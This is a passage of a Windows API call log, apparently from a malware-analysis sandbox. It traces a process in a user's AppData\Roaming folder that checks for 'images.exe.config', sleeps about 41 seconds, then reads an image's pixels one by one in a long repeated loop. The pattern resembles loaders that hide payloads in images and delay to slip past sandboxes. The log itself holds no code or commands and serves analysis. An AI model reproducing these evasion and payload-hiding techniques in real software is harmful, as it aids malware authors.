GetSystemMetrics (nIndex=6) returned 1 [0178.986] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.987] AdjustWindowRectEx (in: lpRect=0x52edd8, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x52edd8) returned 1 [0178.987] GetDC (hWnd=0x0) returned 0x50106d6 [0178.987] GdipCreateFromHDC (hdc=0x50106d6, graphics=0x52ecb0) returned 0x0 [0178.987] GdipGetFontHeight (font=0x5462940, graphics=0x540fcf0, height=0x52eca8) returned 0x0 [0178.987] GdipDeleteGraphics (graphics=0x540fcf0) returned 0x0 [0178.987] ReleaseDC (hWnd=0x0, hDC=0x50106d6) returned 1 [0178.987] GetSystemMetrics (nIndex=5) returned 1 [0178.987] GetSystemMetrics (nIndex=6) returned 1 [0178.988] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.988] AdjustWindowRectEx (in: lpRect=0x52edd8, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x52edd8) returned 1 [0178.988] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.988] AdjustWindowRectEx (in: lpRect=0x52eddc, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x52eddc) returned 1 [0178.988] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.988] AdjustWindowRectEx (in: lpRect=0x52eddc, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x52eddc) returned 1 [0178.989] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.989] AdjustWindowRectEx (in: lpRect=0x52edd8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x52edd8) returned 1 [0178.989] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73390000 [0178.989] AdjustWindowRectEx (in: lpRect=0x52edd8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x52edd8) returned 1 [0179.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0179.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52eb30) returned 1 [0179.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x52ebac | out: lpFileInformation=0x52ebac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0179.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52eb2c) returned 1 [0179.343] SleepEx (dwMilliseconds=0xa21c, bAlertable=1) returned 0x0 [0191.931] GdipLoadImageFromStream (stream=0x1ed0030, image=0x52de30) returned 0x0 [0191.951] GdipImageForceValidation (image=0x540fcf0) returned 0x0 [0191.962] GdipGetImageType (image=0x540fcf0, type=0x52de2c) returned 0x0 [0191.963] GdipGetImageRawFormat (image=0x540fcf0, format=0x52ddb0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0191.993] GdipGetImageWidth (image=0x540fcf0, width=0x52e3b4) returned 0x0 [0191.994] GdipGetImageHeight (image=0x540fcf0, height=0x52e3b4) returned 0x0 [0191.996] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0191.996] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0191.996] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=0, color=0x52e3a0) returned 0x0 [0191.998] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0191.998] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0191.998] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=1, color=0x52e3a0) returned 0x0 [0191.999] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0191.999] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0191.999] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=2, color=0x52e3a0) returned 0x0 [0191.999] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0191.999] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0191.999] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=3, color=0x52e3a0) returned 0x0 [0191.999] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0191.999] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0191.999] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=4, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.000] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=5, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.000] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=6, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.000] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=7, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.000] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=8, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.000] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=9, color=0x52e3a0) returned 0x0 [0192.000] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.000] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=10, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=11, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=12, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=13, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=14, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.001] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=15, color=0x52e3a0) returned 0x0 [0192.001] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.001] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=16, color=0x52e3a0) returned 0x0 [0192.002] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.002] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=17, color=0x52e3a0) returned 0x0 [0192.002] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.002] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=18, color=0x52e3a0) returned 0x0 [0192.002] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.002] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=19, color=0x52e3a0) returned 0x0 [0192.002] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.002] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=20, color=0x52e3a0) returned 0x0 [0192.002] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.002] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.002] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=21, color=0x52e3a0) returned 0x0 [0192.003] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.003] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.003] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=22, color=0x52e3a0) returned 0x0 [0192.003] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.003] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.003] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=23, color=0x52e3a0) returned 0x0 [0192.003] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.003] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.003] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=24, color=0x52e3a0) returned 0x0 [0192.003] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.003] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.003] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=25, color=0x52e3a0) returned 0x0 [0192.003] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.003] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.003] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=26, color=0x52e3a0) returned 0x0 [0192.004] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.004] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.004] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=27, color=0x52e3a0) returned 0x0 [0192.004] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.004] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.004] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=28, color=0x52e3a0) returned 0x0 [0192.004] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.004] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.004] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=29, color=0x52e3a0) returned 0x0 [0192.004] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.004] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.004] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=30, color=0x52e3a0) returned 0x0 [0192.004] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.004] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.004] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=31, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.005] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.005] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=32, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.005] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.005] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=33, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.005] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.005] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=34, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.005] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.005] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=35, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.005] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.005] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=36, color=0x52e3a0) returned 0x0 [0192.005] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=37, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=38, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=39, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=40, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=41, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.006] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=42, color=0x52e3a0) returned 0x0 [0192.006] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.006] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=43, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=44, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=45, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=46, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=47, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.007] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=48, color=0x52e3a0) returned 0x0 [0192.007] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.007] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=49, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=50, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=51, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=52, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=53, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=54, color=0x52e3a0) returned 0x0 [0192.008] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.008] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.008] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=55, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=56, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=57, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=58, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=59, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=60, color=0x52e3a0) returned 0x0 [0192.009] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.009] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.009] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=61, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=62, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=63, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=64, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=65, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=66, color=0x52e3a0) returned 0x0 [0192.010] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.010] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.010] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=67, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=68, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=69, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=70, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=71, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=72, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.011] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.011] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=73, color=0x52e3a0) returned 0x0 [0192.011] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=74, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=75, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=76, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=77, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=78, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.012] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=79, color=0x52e3a0) returned 0x0 [0192.012] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.012] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=80, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=81, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=82, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=83, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=84, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=85, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=86, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.013] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=87, color=0x52e3a0) returned 0x0 [0192.013] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.013] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=88, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=89, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=90, color=0x52e3a0) returned 0x0 [0192.014] GdipGetImageWidth (image=0x540fcf0, width=0x52e390) returned 0x0 [0192.014] GdipGetImageHeight (image=0x540fcf0, height=0x52e390) returned 0x0 [0192.014] GdipBitmapGetPixel (bitmap=0x540fcf0, x=0, y=91, color=0x52e3a0) 